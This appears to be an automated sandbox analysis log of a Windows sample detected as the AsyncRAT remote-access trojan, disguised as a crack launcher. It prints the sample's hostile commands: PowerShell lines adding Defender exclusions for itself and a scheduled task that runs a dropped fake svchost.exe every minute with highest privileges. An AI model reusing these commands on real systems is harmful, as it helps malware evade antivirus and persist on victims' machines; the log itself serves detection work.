Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812

Source: unknown

HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49812 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: a9YMw44iQq.exe PID: 6216, type: MEMORYSTR

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: a9YMw44iQq.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.a9YMw44iQq.exe.150000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\svchost.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Code function: 0_2_00007FFD34886116	0_2_00007FFD34886116
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Code function: 0_2_00007FFD34889189	0_2_00007FFD34889189
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Code function: 0_2_00007FFD348872D2	0_2_00007FFD348872D2
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Code function: 0_2_00007FFD348816D9	0_2_00007FFD348816D9
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Code function: 0_2_00007FFD348823E1	0_2_00007FFD348823E1
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Code function: 0_2_00007FFD34882145	0_2_00007FFD34882145
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Code function: 0_2_00007FFD3488C1E0	0_2_00007FFD3488C1E0
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Code function: 0_2_00007FFD3488959A	0_2_00007FFD3488959A
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Code function: 0_2_00007FFD3488AC55	0_2_00007FFD3488AC55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD348A9FFB	2_2_00007FFD348A9FFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD348A8E05	2_2_00007FFD348A8E05
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD348A8F4A	2_2_00007FFD348A8F4A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD348A2785	2_2_00007FFD348A2785
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34972E11	2_2_00007FFD34972E11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD348B25ED	5_2_00007FFD348B25ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD348B8EFA	5_2_00007FFD348B8EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD34899E7D	8_2_00007FFD34899E7D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD3489947D	8_2_00007FFD3489947D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD34898E05	8_2_00007FFD34898E05
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD348A5EFA	11_2_00007FFD348A5EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD348A8F2A	11_2_00007FFD348A8F2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD348AB9FA	11_2_00007FFD348AB9FA
Source: C:\ProgramData\svchost.exe	Code function: 15_2_00007FFD348916D9	15_2_00007FFD348916D9
Source: C:\ProgramData\svchost.exe	Code function: 15_2_00007FFD34890FF8	15_2_00007FFD34890FF8
Source: C:\ProgramData\svchost.exe	Code function: 15_2_00007FFD34892145	15_2_00007FFD34892145
Source: C:\ProgramData\svchost.exe	Code function: 16_2_00007FFD348B16D9	16_2_00007FFD348B16D9
Source: C:\ProgramData\svchost.exe	Code function: 16_2_00007FFD348B0FF8	16_2_00007FFD348B0FF8
Source: C:\ProgramData\svchost.exe	Code function: 16_2_00007FFD348B2145	16_2_00007FFD348B2145
Source: C:\ProgramData\svchost.exe	Code function: 17_2_00007FFD348B16D9	17_2_00007FFD348B16D9
Source: C:\ProgramData\svchost.exe	Code function: 17_2_00007FFD348B0FF8	17_2_00007FFD348B0FF8
Source: C:\ProgramData\svchost.exe	Code function: 17_2_00007FFD348B2145	17_2_00007FFD348B2145
Source: C:\ProgramData\svchost.exe	Code function: 18_2_00007FFD348C16D9	18_2_00007FFD348C16D9
Source: C:\ProgramData\svchost.exe	Code function: 18_2_00007FFD348C0FF8	18_2_00007FFD348C0FF8
Source: C:\ProgramData\svchost.exe	Code function: 18_2_00007FFD348C2145	18_2_00007FFD348C2145
Source: C:\ProgramData\svchost.exe	Code function: 19_2_00007FFD348B16D9	19_2_00007FFD348B16D9
Source: C:\ProgramData\svchost.exe	Code function: 19_2_00007FFD348B0FF8	19_2_00007FFD348B0FF8

Source: a9YMw44iQq.exe, 00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCrackLauncher.exe4 vs a9YMw44iQq.exe
Source: a9YMw44iQq.exe	Binary or memory string: OriginalFilenameCrackLauncher.exe4 vs a9YMw44iQq.exe

Source: a9YMw44iQq.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: a9YMw44iQq.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.a9YMw44iQq.exe.150000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\svchost.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: a9YMw44iQq.exe, CAKqia57kooc5P6Nhx6x0okYjQzUptMk.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: a9YMw44iQq.exe, Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: a9YMw44iQq.exe, Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, CAKqia57kooc5P6Nhx6x0okYjQzUptMk.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: a9YMw44iQq.exe, Bf13MrTgh7zf0ag.cs	Base64 encoded string: 'ml4fj+TR+1eXKF5wbGywI0vn8uX23GwIvzDcpH3VT04QjOdGsI++LZT/1+ltN8VO'
Source: svchost.exe.0.dr, Bf13MrTgh7zf0ag.cs	Base64 encoded string: 'ml4fj+TR+1eXKF5wbGywI0vn8uX23GwIvzDcpH3VT04QjOdGsI++LZT/1+ltN8VO'

Source: svchost.exe.0.dr, KTFdTAhBe0nkVRO.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchost.exe.0.dr, KTFdTAhBe0nkVRO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: a9YMw44iQq.exe, KTFdTAhBe0nkVRO.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: a9YMw44iQq.exe, KTFdTAhBe0nkVRO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@21/21@2/3

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
Source: C:\ProgramData\svchost.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Mutant created: \Sessions\1\BaseNamedObjects\1WuAENfHx9TxfyQ1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

File created: C:\Users\user\AppData\Local\Temp\Log.tmp

Jump to behavior

Source: a9YMw44iQq.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: a9YMw44iQq.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: a9YMw44iQq.exe

ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

File read: C:\Users\user\Desktop\a9YMw44iQq.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\a9YMw44iQq.exe "C:\Users\user\Desktop\a9YMw44iQq.exe"
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'a9YMw44iQq.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\svchost.exe C:\ProgramData\svchost.exe
Source: unknown	Process created: C:\ProgramData\svchost.exe C:\ProgramData\svchost.exe
Source: unknown	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: unknown	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: unknown	Process created: C:\ProgramData\svchost.exe C:\ProgramData\svchost.exe
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe'	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'a9YMw44iQq.exe'	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
